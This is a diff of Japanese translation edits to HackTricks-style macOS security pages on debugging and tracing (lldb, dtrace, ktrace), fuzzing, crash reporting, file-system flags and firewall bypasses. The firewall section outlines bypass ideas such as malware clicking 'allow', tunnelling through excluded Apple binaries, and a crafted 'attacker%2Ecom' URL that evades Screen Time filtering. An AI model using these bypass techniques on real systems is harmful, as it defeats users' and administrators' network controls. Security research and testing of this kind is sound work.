-さらに、**中央下部ではPythonコマンドを入力**できます。 +さらに、**中央下部ではPythonコマンドを入力することができます**。 #### 右パネル -右パネルでは、**ナビゲーション履歴**(現在の状況に到達した方法を知るため)、**コールグラフ**(この関数を呼び出すすべての**関数**と、この関数が呼び出すすべての関数を見ることができます)、および**ローカル変数**の情報など、興味深い情報を見ることができます。 +右パネルでは、**ナビゲーション履歴**(現在の状況にどのように到達したかを知るため)、**コールグラフ**(この関数を呼び出すすべての**関数**と、この関数が呼び出すすべての関数を見ることができます)、および**ローカル変数**の情報など、興味深い情報を見ることができます。 ### dtrace -これは、ユーザーがアプリケーションに非常に**低レベル**でアクセスできるようにし、プログラムを**トレース**し、その実行フローを変更する方法を提供します。Dtraceは、**カーネル全体に配置された**プローブを使用し、システムコールの開始と終了などの場所にあります。 +これは、ユーザーがアプリケーションに非常に**低レベル**でアクセスできるようにし、ユーザーが**プログラムをトレース**し、その実行フローを変更する方法を提供します。Dtraceは、**カーネル全体に配置された**プローブを使用し、システムコールの開始と終了などの場所にあります。 DTraceは、各システムコールのプローブを作成するために**`dtrace_probe_create`**関数を使用します。これらのプローブは、各システムコールの**エントリポイントとエグジットポイント**で発火することができます。DTraceとのインタラクションは、/dev/dtraceを介して行われ、これはrootユーザーのみが利用可能です。 @@ -285,7 +285,7 @@ ID PROVIDER MODULE FUNCTION NAME DTraceを構成してプローブをアクティブにし、発火したときに実行するアクションを指定するには、D言語を使用する必要があります。 -より詳細な説明と例については、[https://illumos.org/books/dtrace/chp-intro.html](https://illumos.org/books/dtrace/chp-intro.html)を参照してください。 +より詳細な説明とさらに多くの例は、[https://illumos.org/books/dtrace/chp-intro.html](https://illumos.org/books/dtrace/chp-intro.html)で見つけることができます。 #### 例 @@ -343,7 +343,7 @@ dtruss -c -p 1000 #get syscalls of PID 1000 `latency`、`sc_usage`、`fs_usage`、および`trace`のようなツールは内部でこれを使用します。 -`kdebug`とインターフェースするために、`sysctl`が`kern.kdebug`名前空間を介して使用され、使用するMIBは`sys/sysctl.h`にあり、関数は`bsd/kern/kdebug.c`に実装されています。 +`kdebug`とインターフェースするには、`kern.kdebug`名前空間を介して`sysctl`が使用され、使用するMIBは`sys/sysctl.h`にあり、関数は`bsd/kern/kdebug.c`に実装されています。 カスタムクライアントでkdebugと対話するための一般的な手順は次のとおりです: @@ -361,9 +361,9 @@ dtruss -c -p 1000 #get syscalls of PID 1000 ### ktrace -`ktrace_*` APIは`libktrace.dylib`から来ており、これが`Kdebug`のラッパーです。クライアントは`ktrace_session_create`および`ktrace_events_[single/class]`を呼び出して特定のコードにコールバックを設定し、`ktrace_start`で開始できます。 +`ktrace_*` APIは`libktrace.dylib`から来ており、これが`Kdebug`のラッパーです。クライアントは`ktrace_session_create`と`ktrace_events_[single/class]`を呼び出して特定のコードにコールバックを設定し、`ktrace_start`で開始できます。 -これは**SIPが有効な状態でも使用できます。** +**SIPが有効になっていてもこれを使用できます。** クライアントとしてユーティリティ`ktrace`を使用できます: ```bash @@ -388,7 +388,7 @@ Kperf には sysctl MIB テーブルもあります:(root として)`sysct ### SpriteTree [**SpriteTree**](https://themittenmac.com/tools/) は、プロセス間の関係を表示するツールです。\ -**`sudo eslogger fork exec rename create > cap.json`** のようなコマンドで Mac を監視する必要があります(これを起動するには FDA が必要です)。その後、このツールに json を読み込んで、すべての関係を表示できます: +**`sudo eslogger fork exec rename create > cap.json`** のようなコマンドで Mac を監視する必要があります(このターミナルを起動するには FDA が必要です)。その後、このツールに json を読み込んで、すべての関係を表示できます:
@@ -415,7 +415,7 @@ fs_usage -w -f network curl #This tracks network actions ``` ### TaskExplorer -[**Taskexplorer**](https://objective-see.com/products/taskexplorer.html) は、バイナリで使用されている **ライブラリ**、使用している **ファイル**、および **ネットワーク** 接続を確認するのに便利です。\ +[**Taskexplorer**](https://objective-see.com/products/taskexplorer.html) は、バイナリによって使用される **ライブラリ**、使用している **ファイル**、および **ネットワーク** 接続を確認するのに便利です。\ また、バイナリプロセスを **virustotal** と照合し、バイナリに関する情報を表示します。 ## PT_DENY_ATTACH @@ -431,17 +431,17 @@ lldb -p 1122 lldb -n malware.bin lldb -n malware.bin --waitfor ``` -ホームフォルダに **`.lldbinit`** というファイルを作成し、次の行を追加することで、intel フレーバーを設定できます: +インテルフレーバーを設定するには、ホームフォルダーに**`.lldbinit`**というファイルを作成し、次の行を追加します: ```bash settings set target.x86-disassembly-flavor intel ``` > [!WARNING] > lldb内で、`process save-core`を使用してプロセスをダンプします。 -
(lldb) コマンド説明
run (r)実行を開始し、ブレークポイントがヒットするかプロセスが終了するまで継続します。
process launch --stop-at-entryエントリポイントで停止するように実行を開始します。
continue (c)デバッグ中のプロセスの実行を続けます。
nexti (n / ni)次の命令を実行します。このコマンドは関数呼び出しをスキップします。
stepi (s / si)次の命令を実行します。nextiコマンドとは異なり、このコマンドは関数呼び出しに入ります。
finish (f)現在の関数(“フレーム”)内の残りの命令を実行し、戻って停止します。
control + c実行を一時停止します。プロセスが実行(r)または続行(c)されている場合、これによりプロセスは現在実行中の場所で停止します。
breakpoint (b)

b main #mainと呼ばれる任意の関数

b `main #バイナリのメイン関数

b set -n main --shlib #指定されたバイナリのメイン関数

breakpoint set -r '\[NSFileManager .*\]$' #任意のNSFileManagerメソッド

breakpoint set -r '\[NSFileManager contentsOfDirectoryAtPath:.*\]$'

break set -r . -s libobjc.A.dylib #そのライブラリのすべての関数でブレーク

b -a 0x0000000100004bd9

br l #ブレークポイントリスト

br e/dis #ブレークポイントの有効/無効

breakpoint delete

help

help breakpoint #ブレークポイントコマンドのヘルプを取得

help memory write #メモリへの書き込みのヘルプを取得

reg

reg read

reg read $rax

reg read $rax --format <format>

reg write $rip 0x100035cc0

x/s メモリをヌル終端文字列として表示します。
x/i メモリをアセンブリ命令として表示します。
x/b メモリをバイトとして表示します。
print object (po)

これは、パラメータによって参照されるオブジェクトを印刷します。

po $raw

{

dnsChanger = {

"affiliate" = "";

"blacklist_dns" = ();

AppleのObjective-C APIやメソッドのほとんどはオブジェクトを返すため、"print object" (po) コマンドを使用して表示する必要があります。poが意味のある出力を生成しない場合は、x/bを使用してください。

memorymemory read 0x000....
memory read $x0+0xf2a
memory write 0x100600000 -s 4 0x41414141 #そのアドレスにAAAAを書き込みます
memory write -f s $rip+0x11f+7 "AAAA" #そのアドレスにAAAAを書き込みます
disassembly

dis #現在の関数を逆アセンブル

dis -n #関数を逆アセンブル

dis -n -b #関数を逆アセンブル
dis -c 6 #6行を逆アセンブル
dis -c 0x100003764 -e 0x100003768 #1つのアドレスから別のアドレスまで
dis -p -c 4 #現在のアドレスから逆アセンブルを開始

parrayparray 3 (char **)$x1 # x1レジスタの3つのコンポーネントの配列を確認
image dump sections現在のプロセスメモリのマップを印刷します。
image dump symtab image dump symtab CoreNLP #CoreNLPからすべてのシンボルのアドレスを取得
+
(lldb) コマンド説明
run (r)実行を開始し、ブレークポイントがヒットするかプロセスが終了するまで継続します。
process launch --stop-at-entryエントリポイントで停止する実行を開始します。
continue (c)デバッグ中のプロセスの実行を続けます。
nexti (n / ni)次の命令を実行します。このコマンドは関数呼び出しをスキップします。
stepi (s / si)次の命令を実行します。nextiコマンドとは異なり、このコマンドは関数呼び出しに入ります。
finish (f)現在の関数(“フレーム”)内の残りの命令を実行し、戻って停止します。
control + c実行を一時停止します。プロセスが実行(r)または続行(c)されている場合、これによりプロセスは現在実行中の場所で停止します。
breakpoint (b)

b main #mainと呼ばれる任意の関数

b `main #バイナリのメイン関数

b set -n main --shlib #指定されたバイナリのメイン関数

breakpoint set -r '\[NSFileManager .*\]$' #任意のNSFileManagerメソッド

breakpoint set -r '\[NSFileManager contentsOfDirectoryAtPath:.*\]$'

break set -r . -s libobjc.A.dylib #そのライブラリのすべての関数でブレーク

b -a 0x0000000100004bd9

br l #ブレークポイントリスト

br e/dis #ブレークポイントを有効/無効にする

breakpoint delete

help

help breakpoint #ブレークポイントコマンドのヘルプを取得

help memory write #メモリへの書き込みのヘルプを取得

reg

reg read

reg read $rax

reg read $rax --format <format>

reg write $rip 0x100035cc0

x/s メモリをヌル終端文字列として表示します。
x/i メモリをアセンブリ命令として表示します。
x/b メモリをバイトとして表示します。
print object (po)

これは、パラメータで参照されるオブジェクトを印刷します。

po $raw

{

dnsChanger = {

"affiliate" = "";

"blacklist_dns" = ();

AppleのObjective-C APIやメソッドのほとんどはオブジェクトを返すため、"print object" (po) コマンドを使用して表示する必要があります。poが意味のある出力を生成しない場合は、x/bを使用してください。

memorymemory read 0x000....
memory read $x0+0xf2a
memory write 0x100600000 -s 4 0x41414141 #そのアドレスにAAAAを書き込みます
memory write -f s $rip+0x11f+7 "AAAA" #そのアドレスにAAAAを書き込みます
disassembly

dis #現在の関数を逆アセンブル

dis -n #関数を逆アセンブル

dis -n -b #関数を逆アセンブル
dis -c 6 #6行を逆アセンブル
dis -c 0x100003764 -e 0x100003768 #1つのアドレスから別のアドレスまで
dis -p -c 4 #現在のアドレスから逆アセンブルを開始

parrayparray 3 (char **)$x1 # x1レジスタの3つのコンポーネントの配列を確認
image dump sections現在のプロセスメモリのマップを印刷します。
image dump symtab image dump symtab CoreNLP #CoreNLPからすべてのシンボルのアドレスを取得
-> [!NOTE] -> **`objc_sendMsg`**関数を呼び出すと、**rsi**レジスタにはヌル終端(“C”)文字列として**メソッドの名前**が保持されます。lldbを介して名前を印刷するには、次のようにします: +> [!TIP] +> **`objc_sendMsg`**関数を呼び出すとき、**rsi**レジスタはヌル終端(“C”)文字列として**メソッドの名前**を保持します。lldbを介して名前を印刷するには、次のようにします: > > `(lldb) x/s $rsi: 0x1000f1576: "startMiningWithPort:password:coreCount:slowMemory:currency:"` > @@ -462,7 +462,7 @@ settings set target.x86-disassembly-flavor intel - **`ptrace`**システムコールを**`PT_DENY_ATTACH`**フラグで呼び出すこともできます。これにより、デバッガがアタッチしてトレースするのを**防ぎます**。 - **`sysctl`**または**`ptrace`**関数が**インポートされているかどうかを確認できます**(ただし、マルウェアは動的にインポートする可能性があります)。 - この書き込みで指摘されているように、「[アンチデバッグ技術を打破する:macOS ptraceのバリアント](https://alexomara.com/blog/defeating-anti-debug-techniques-macos-ptrace-variants/)」:\ -“_メッセージProcess # exited with **status = 45 (0x0000002d)**は、デバッグターゲットが**PT_DENY_ATTACH**を使用していることを示す兆候です_” +“_メッセージProcess # exited with **status = 45 (0x0000002d)**は、デバッグ対象が**PT_DENY_ATTACH**を使用していることを示す兆候です_” ## コアダンプ @@ -478,11 +478,11 @@ settings set target.x86-disassembly-flavor intel ### [ReportCrash](https://ss64.com/osx/reportcrash.html) -ReportCrashは**クラッシュしたプロセスを分析し、クラッシュレポートをディスクに保存します**。クラッシュレポートには、**開発者がクラッシュの原因を診断するのに役立つ情報が含まれています**。\ +ReportCrashは**クラッシュしたプロセスを分析し、クラッシュレポートをディスクに保存します**。クラッシュレポートには、**開発者がクラッシュの原因を診断するのに役立つ情報**が含まれています。\ ユーザーごとのlaunchdコンテキストで**実行されているアプリケーションや他のプロセス**の場合、ReportCrashはLaunchAgentとして実行され、ユーザーの`~/Library/Logs/DiagnosticReports/`にクラッシュレポートを保存します。\ デーモン、システムlaunchdコンテキストで**実行されている他のプロセス**および他の特権プロセスの場合、ReportCrashはLaunchDaemonとして実行され、システムの`/Library/Logs/DiagnosticReports`にクラッシュレポートを保存します。 -クラッシュレポートが**Appleに送信されることを心配している場合**は、それらを無効にできます。そうでない場合、クラッシュレポートは**サーバーがどのようにクラッシュしたかを理解するのに役立ちます**。 +クラッシュレポートが**Appleに送信されることを心配している場合**は、それを無効にできます。そうでない場合、クラッシュレポートは**サーバーがどのようにクラッシュしたかを把握するのに役立ちます**。 ```bash #To disable crash reporting: launchctl unload -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist @@ -513,7 +513,8 @@ sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist ``` ### Internal Handlers -**次のページを確認してください** どのアプリが **指定されたスキームまたはプロトコルを処理しているかを見つける方法を知るために:** +**次のページを確認してください** どのアプリが **指定されたスキームまたはプロトコルを処理しているかを見つける方法を知るために:** + {{#ref}} ../macos-file-extension-apps.md @@ -521,7 +522,7 @@ sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist ### Enumerating Network Processes -これは、ネットワークデータを管理しているプロセスを見つけるのに興味深いです: +これは、ネットワークデータを管理しているプロセスを見つけるのに興味深いです: ```bash dtrace -n 'syscall::recv*:entry { printf("-> %s (pid=%d)", execname, pid); }' >> recv.log #wait some time @@ -540,7 +541,7 @@ lldb -o "target create `which some-binary`" -o "settings set target.env-vars DYL #### [AFL++](https://github.com/AFLplusplus/AFLplusplus) -CLIツールで動作します。 +CLIツールに対応しています。 #### [Litefuzz](https://github.com/sec-tools/litefuzz) @@ -570,18 +571,18 @@ litefuzz -lk -c "smbutil view smb://localhost:4455" -a tcp://localhost:4455 -i i # screensharingd (using pcap capture) litefuzz -s -a tcp://localhost:5900 -i input/screenshared-session --reportcrash screensharingd -p -n 100000 ``` -### さらなるFuzzing MacOS情報 +### More Fuzzing MacOS Info - [https://www.youtube.com/watch?v=T5xfL9tEg44](https://www.youtube.com/watch?v=T5xfL9tEg44) - [https://github.com/bnagy/slides/blob/master/OSXScale.pdf](https://github.com/bnagy/slides/blob/master/OSXScale.pdf) - [https://github.com/bnagy/francis/tree/master/exploitaben](https://github.com/bnagy/francis/tree/master/exploitaben) - [https://github.com/ant4g0nist/crashwrangler](https://github.com/ant4g0nist/crashwrangler) -## 参考文献 +## References - [**OS X インシデントレスポンス: スクリプティングと分析**](https://www.amazon.com/OS-Incident-Response-Scripting-Analysis-ebook/dp/B01FHOHHVS) - [**https://www.youtube.com/watch?v=T5xfL9tEg44**](https://www.youtube.com/watch?v=T5xfL9tEg44) - [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html) -- [**Macマルウェアの技術: 悪意のあるソフトウェアの分析ガイド**](https://taomm.org/) +- [**マルウェアのアート: 悪意のあるソフトウェアの分析ガイド**](https://taomm.org/) {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md index 06b1c6467..9e5857084 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md @@ -12,11 +12,11 @@ ### 合成クリック -- ファイアウォールがユーザーに許可を求める場合、マルウェアに **許可をクリックさせる**。 +- ファイアウォールがユーザーに許可を求める場合、マルウェアに**許可をクリックさせる**。 ### **Apple 署名のバイナリを使用** -- **`curl`** のようなもの、また **`whois`** など他のものも。 +- **`curl`** のようなもの、または **`whois`** のような他のものも。 ### よく知られた Apple ドメイン @@ -24,11 +24,11 @@ ### 一般的なバイパス -ファイアウォールをバイパスするために試すべきいくつかのアイデア。 +ファイアウォールをバイパスするために試すべきアイデア。 ### 許可されたトラフィックの確認 -許可されたトラフィックを知ることで、潜在的にホワイトリストに登録されたドメインや、どのアプリケーションがそれにアクセスできるかを特定するのに役立ちます。 +許可されたトラフィックを知ることで、潜在的にホワイトリストに登録されたドメインや、それにアクセスを許可されているアプリケーションを特定するのに役立ちます。 ```bash lsof -i TCP -sTCP:ESTABLISHED ``` @@ -74,26 +74,26 @@ macos-proces-abuse/ ## 最近のmacOSファイアウォールバイパス脆弱性 (2023-2025) ### ウェブコンテンツフィルター(スクリーンタイム)バイパス – **CVE-2024-44206** -2024年7月、Appleはスクリーンタイムの親の管理機能で使用されるシステム全体の「ウェブコンテンツフィルター」における重大なバグを修正しました。 +2024年7月、Appleはスクリーンタイムの親の管理機能で使用されるシステム全体の「ウェブコンテンツフィルター」に影響を与える重大なバグをSafari/WebKitで修正しました。 特別に作成されたURI(例えば、二重URLエンコードされた“://”を含む)は、スクリーンタイムのACLでは認識されませんが、WebKitでは受け入れられるため、リクエストはフィルタリングされずに送信されます。したがって、URLを開くことができる任意のプロセス(サンドボックス化されたコードや署名されていないコードを含む)は、ユーザーまたはMDMプロファイルによって明示的にブロックされたドメインに到達できます。 -実践テスト(パッチ未適用システム): +実践テスト(未修正のシステム): ```bash open "http://attacker%2Ecom%2F./" # should be blocked by Screen Time # if the patch is missing Safari will happily load the page ``` ### Packet Filter (PF) ルール順序バグ in early macOS 14 “Sonoma” macOS 14 ベータサイクル中に、Apple は **`pfctl`** のユーザースペースラッパーに回帰を導入しました。 -`quick` キーワードを使用して追加されたルール(多くの VPN キルスイッチで使用される)は静かに無視され、VPN/ファイアウォール GUI が *ブロックされた* と報告してもトラフィックの漏洩を引き起こしました。このバグは複数の VPN ベンダーによって確認され、RC 2 (ビルド 23A344) で修正されました。 +`quick` キーワードを使用して追加されたルール(多くの VPN キルスイッチで使用される)は、静かに無視され、VPN/ファイアウォール GUI が *ブロックされた* と報告してもトラフィックの漏洩を引き起こしました。このバグは複数の VPN ベンダーによって確認され、RC 2 (ビルド 23A344) で修正されました。 Quick leak-check: ```bash pfctl -sr | grep quick # rules are present… sudo tcpdump -n -i en0 not port 53 # …but packets still leave the interface ``` -### Apple署名のヘルパーサービスの悪用(レガシー – macOS 11.2以前) -macOS 11.2以前では、**`ContentFilterExclusionList`** により、**`nsurlsessiond`** やApp Storeなど約50のAppleバイナリが、Network Extensionフレームワーク(LuLu、Little Snitchなど)で実装されたすべてのソケットフィルターファイアウォールをバイパスできました。 -マルウェアは単に除外されたプロセスを生成するか、そこにコードを注入し、すでに許可されたソケットを介して自分のトラフィックをトンネルすることができました。AppleはmacOS 11.2で除外リストを完全に削除しましたが、この技術はアップグレードできないシステムでは依然として関連性があります。 +### Apple署名のヘルパーサービスの悪用(レガシー - macOS 11.2以前) +macOS 11.2以前では、**`ContentFilterExclusionList`**により、**`nsurlsessiond`**やApp Storeなど約50のAppleバイナリがNetwork Extensionフレームワーク(LuLu、Little Snitchなど)で実装されたすべてのソケットフィルターファイアウォールをバイパスすることができました。 +マルウェアは単に除外されたプロセスを生成するか、そこにコードを注入し、すでに許可されたソケットを介して自分のトラフィックをトンネルすることができました。AppleはmacOS 11.2で除外リストを完全に削除しましたが、この手法はアップグレードできないシステムでは依然として関連性があります。 例の概念実証(11.2以前): ```python diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md index 0579566cc..4959cb667 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md @@ -1,4 +1,4 @@ -# macOSのファイル、フォルダー、バイナリとメモリ +# macOS ファイル、フォルダー、バイナリおよびメモリ {{#include ../../../banners/hacktricks-training.md}} @@ -15,18 +15,18 @@ - **/System**: OS Xを実行するためのファイルです。ここには主にApple特有のファイル(サードパーティではない)があります。 - **/tmp**: ファイルは3日後に削除されます(これは/private/tmpへのソフトリンクです)。 - **/Users**: ユーザーのホームディレクトリ。 -- **/usr**: 設定とシステムバイナリ +- **/usr**: 設定およびシステムバイナリ - **/var**: ログファイル - **/Volumes**: マウントされたドライブがここに表示されます。 -- **/.vol**: `stat a.txt`を実行すると、`16777223 7545753 -rw-r--r-- 1 username wheel ...`のような出力が得られます。最初の数字はファイルが存在するボリュームのID番号で、2番目はinode番号です。この情報を使って`cat /.vol/16777223/7545753`を実行することで、このファイルの内容にアクセスできます。 +- **/.vol**: `stat a.txt`を実行すると、`16777223 7545753 -rw-r--r-- 1 username wheel ...`のような出力が得られます。最初の数字はファイルが存在するボリュームのID番号で、2番目の数字はinode番号です。この情報を使って`cat /.vol/16777223/7545753`を実行することで、このファイルの内容にアクセスできます。 ### アプリケーションフォルダー - **システムアプリケーション**は`/System/Applications`にあります。 - **インストールされた**アプリケーションは通常`/Applications`または`~/Applications`にインストールされます。 - **アプリケーションデータ**は、rootとして実行されるアプリケーションのために`/Library/Application Support`に、ユーザーとして実行されるアプリケーションのために`~/Library/Application Support`にあります。 -- サードパーティのアプリケーションの**デーモン**は、通常`/Library/PrivilegedHelperTools/`にあります。 -- **サンドボックス化された**アプリは`~/Library/Containers`フォルダーにマッピングされます。各アプリにはアプリケーションのバンドルID(`com.apple.Safari`)に従った名前のフォルダーがあります。 +- サードパーティアプリケーションの**デーモン**は、通常`/Library/PrivilegedHelperTools/`にあります。 +- **サンドボックス化された**アプリは`~/Library/Containers`フォルダーにマッピングされます。各アプリにはアプリケーションのバンドルID(`com.apple.Safari`)に基づいた名前のフォルダーがあります。 - **カーネル**は`/System/Library/Kernels/kernel`にあります。 - **Appleのカーネル拡張**は`/System/Library/Extensions`にあります。 - **サードパーティのカーネル拡張**は`/Library/Extensions`に保存されています。 @@ -56,7 +56,7 @@ macos-installers-abuse.md - `plutil -p ~/Library/Preferences/com.apple.screensaver.plist` - `plutil -convert xml1 ~/Library/Preferences/com.apple.screensaver.plist -o -` - `plutil -convert json ~/Library/Preferences/com.apple.screensaver.plist -o -` -- **`.app`**: ディレクトリ構造に従ったAppleアプリケーション(バンドルです)。 +- **`.app`**: ディレクトリ構造に従うAppleアプリケーション(バンドルです)。 - **`.dylib`**: 動的ライブラリ(Windows DLLファイルのようなもの) - **`.pkg`**: xar(eXtensible Archive format)と同じです。インストーラーコマンドを使用してこれらのファイルの内容をインストールできます。 - **`.DS_Store`**: このファイルは各ディレクトリにあり、ディレクトリの属性とカスタマイズを保存します。 @@ -67,22 +67,22 @@ macos-installers-abuse.md ### macOSバンドル -バンドルは**Finderでオブジェクトのように見える**(バンドルの例は`*.app`ファイルです)**ディレクトリ**です。 +バンドルは**Finder内のオブジェクトのように見えるディレクトリ**です(バンドルの例は`*.app`ファイルです)。 {{#ref}} macos-bundles.md {{#endref}} -## Dyld共有ライブラリキャッシュ(SLC) +## Dyld Shared Library Cache (SLC) -macOS(およびiOS)では、すべてのシステム共有ライブラリ、フレームワークやdylibのようなものが**単一のファイル**に**結合されて**おり、これを**dyld共有キャッシュ**と呼びます。これにより、コードをより速く読み込むことができ、パフォーマンスが向上します。 +macOS(およびiOS)では、すべてのシステム共有ライブラリ、フレームワークやdylibが**単一のファイル**に**結合されて**おり、これを**dyld共有キャッシュ**と呼びます。これにより、コードをより速く読み込むことができ、パフォーマンスが向上します。 これはmacOSの`/System/Volumes/Preboot/Cryptexes/OS/System/Library/dyld/`にあり、古いバージョンでは**`/System/Library/dyld/`**に**共有キャッシュ**が見つかるかもしれません。\ iOSでは**`/System/Library/Caches/com.apple.dyld/`**にあります。 dyld共有キャッシュと同様に、カーネルとカーネル拡張もカーネルキャッシュにコンパイルされ、ブート時にロードされます。 -単一ファイルのdylib共有キャッシュからライブラリを抽出するために、バイナリの[dyld_shared_cache_util](https://www.mbsplugins.de/files/dyld_shared_cache_util-dyld-733.8.zip)を使用することが可能でしたが、現在は機能しないかもしれませんが、[**dyldextractor**](https://github.com/arandomdev/dyldextractor)を使用することもできます: +単一ファイルのdylib共有キャッシュからライブラリを抽出するために、バイナリの[dyld_shared_cache_util](https://www.mbsplugins.de/files/dyld_shared_cache_util-dyld-733.8.zip)を使用することが可能でしたが、現在は機能しないかもしれませんが、[**dyldextractor**](https://github.com/arandomdev/dyldextractor)を使用することもできます。 ```bash # dyld_shared_cache_util dyld_shared_cache_util -extract ~/shared_cache/ /System/Volumes/Preboot/Cryptexes/OS/System/Library/dyld/dyld_shared_cache_arm64e @@ -97,7 +97,7 @@ dyldex_all [dyld_shared_cache_path] # Extract all
-一部のエクストラクターは、dylibs がハードコーディングされたアドレスでプリリンクされているため、未知のアドレスにジャンプする可能性があるため、機能しない場合があります。 +一部のエクストラクターは、dylibs がハードコーディングされたアドレスでプリリンクされているため、未知のアドレスにジャンプする可能性があるため、機能しないことがあります。 > [!TIP] > エミュレーターを使用して Xcode で他の \*OS デバイスの共有ライブラリキャッシュをダウンロードすることも可能です。これらは次の場所にダウンロードされます: ls `$HOME/Library/Developer/Xcode/<*>OS\ DeviceSupport//Symbols/System/Library/Caches/com.apple.dyld/`、例:`$HOME/Library/Developer/Xcode/iOS\ DeviceSupport/14.1\ (18A8395)/Symbols/System/Library/Caches/com.apple.dyld/dyld_shared_cache_arm64` @@ -106,7 +106,7 @@ dyldex_all [dyld_shared_cache_path] # Extract all **`dyld`** は、SLC がマッピングされているかどうかを知るためにシステムコール **`shared_region_check_np`** を使用し(アドレスを返します)、**`shared_region_map_and_slide_np`** を使用して SLC をマッピングします。 -SLC が最初の使用時にスライドしても、すべての **プロセス** は **同じコピー** を使用するため、攻撃者がシステムでプロセスを実行できる場合、**ASLR** 保護が **排除されます**。これは実際に過去に悪用され、共有領域ページャーで修正されました。 +SLC が最初の使用時にスライドしても、すべての **プロセス** は **同じコピー** を使用するため、攻撃者がシステムでプロセスを実行できる場合、**ASLR** 保護が **排除されます**。これは過去に実際に悪用され、共有領域ページャーで修正されました。 ブランチプールは、画像マッピングの間に小さなスペースを作成する小さな Mach-O dylibs であり、関数を介入させることを不可能にします。 @@ -121,23 +121,23 @@ SLC が最初の使用時にスライドしても、すべての **プロセス* ### フォルダの権限 -**フォルダ**内の **読み取り** は **リスト** を許可し、**書き込み** は **削除** と **書き込み** を許可し、**実行** は **ディレクトリを横断** することを許可します。したがって、たとえば、**実行権限がない**ディレクトリ内のファイルに対して **読み取り権限を持つユーザー** は、そのファイルを **読み取ることができません**。 +**フォルダ**内の **読み取り** は **リスト** を許可し、**書き込み** はその中のファイルを **削除** および **書き込む** ことを許可し、**実行** はディレクトリを **横断** することを許可します。したがって、たとえば、**実行権限を持たない**ディレクトリ内のファイルに対して **読み取り権限を持つ**ユーザーは、そのファイルを **読み取ることができません**。 ### フラグ修飾子 -ファイルに設定できるフラグがいくつかあり、ファイルの動作を異なるものにします。ディレクトリ内のファイルの **フラグを確認** するには `ls -lO /path/directory` を使用します。 +ファイルに設定できるフラグがいくつかあり、ファイルの動作を異なるものにします。ディレクトリ内のファイルの **フラグを確認する**には `ls -lO /path/directory` を使用します。 -- **`uchg`**: **uchange** フラグとして知られ、**ファイル**の変更や削除を **防止** します。設定するには: `chflags uchg file.txt` -- ルートユーザーは **フラグを削除** し、ファイルを変更できます。 -- **`restricted`**: このフラグはファイルを **SIP によって保護** します(このフラグをファイルに追加することはできません)。 -- **`Sticky bit`**: スティッキービットが設定されたディレクトリでは、**ディレクトリの所有者またはルートのみがファイルを名前変更または削除**できます。通常、これは /tmp ディレクトリに設定され、通常のユーザーが他のユーザーのファイルを削除または移動するのを防ぎます。 +- **`uchg`**: **uchange** フラグとして知られ、**ファイル**の変更や削除を **防止します**。設定するには: `chflags uchg file.txt` +- ルートユーザーは **フラグを削除**し、ファイルを変更できます。 +- **`restricted`**: このフラグはファイルを **SIP によって保護**します(このフラグをファイルに追加することはできません)。 +- **`Sticky bit`**: スティッキービットを持つディレクトリでは、**所有者またはルートのみがファイルを名前変更または削除**できます。通常、これは /tmp ディレクトリに設定され、通常のユーザーが他のユーザーのファイルを削除または移動するのを防ぎます。 すべてのフラグはファイル `sys/stat.h` に見つけることができ(`mdfind stat.h | grep stat.h` を使用して見つけます)、次のようになります: - `UF_SETTABLE` 0x0000ffff: 所有者変更可能フラグのマスク。 - `UF_NODUMP` 0x00000001: ファイルをダンプしない。 - `UF_IMMUTABLE` 0x00000002: ファイルは変更できません。 -- `UF_APPEND` 0x00000004: ファイルへの書き込みは追加のみ可能です。 +- `UF_APPEND` 0x00000004: ファイルへの書き込みは追加のみ可能。 - `UF_OPAQUE` 0x00000008: ディレクトリはユニオンに対して不透明です。 - `UF_COMPRESSED` 0x00000020: ファイルは圧縮されています(いくつかのファイルシステム)。 - `UF_TRACKED` 0x00000040: この設定があるファイルの削除/名前変更に対する通知はありません。 @@ -148,7 +148,7 @@ SLC が最初の使用時にスライドしても、すべての **プロセス* - `SF_SYNTHETIC` 0xc0000000: システム読み取り専用合成フラグのマスク。 - `SF_ARCHIVED` 0x00010000: ファイルはアーカイブされています。 - `SF_IMMUTABLE` 0x00020000: ファイルは変更できません。 -- `SF_APPEND` 0x00040000: ファイルへの書き込みは追加のみ可能です。 +- `SF_APPEND` 0x00040000: ファイルへの書き込みは追加のみ可能。 - `SF_RESTRICTED` 0x00080000: 書き込みには権限が必要です。 - `SF_NOUNLINK` 0x00100000: アイテムは削除、名前変更、またはマウントできません。 - `SF_FIRMLINK` 0x00800000: ファイルはファームリンクです。 @@ -159,7 +159,7 @@ SLC が最初の使用時にスライドしても、すべての **プロセス* ファイル **ACLs** には **ACE** (アクセス制御エントリ) が含まれており、異なるユーザーに対してより **詳細な権限** を割り当てることができます。 **ディレクトリ** に次の権限を付与することが可能です: `list`, `search`, `add_file`, `add_subdirectory`, `delete_child`, `delete_child`。\ -ファイルには: `read`, `write`, `append`, `execute`。 +ファイルに対しては: `read`, `write`, `append`, `execute`。 ファイルに ACLs が含まれている場合、権限をリスト表示すると **"+" が表示されます**: ```bash @@ -172,7 +172,7 @@ ls -lde Movies drwx------+ 7 username staff 224 15 Apr 19:42 Movies 0: group:everyone deny delete ``` -すべてのACLを持つ**ファイルを見つける**には(これは非常に遅いです): +すべてのACLを持つファイルを見つけるには(これは非常に遅いです): ```bash ls -RAle / 2>/dev/null | grep -E -B1 "\d: " ``` @@ -189,14 +189,14 @@ ls -RAle / 2>/dev/null | grep -E -B1 "\d: " - `com.apple.logd.metadata`: `/var/db/diagnostics`内のファイルでlogdによって使用される - `com.apple.genstore.*`: 世代ストレージ(ファイルシステムのルートにある`/.DocumentRevisions-V100`) - `com.apple.rootless`: MacOS: システム整合性保護によってファイルにラベル付けされる (III/10) -- 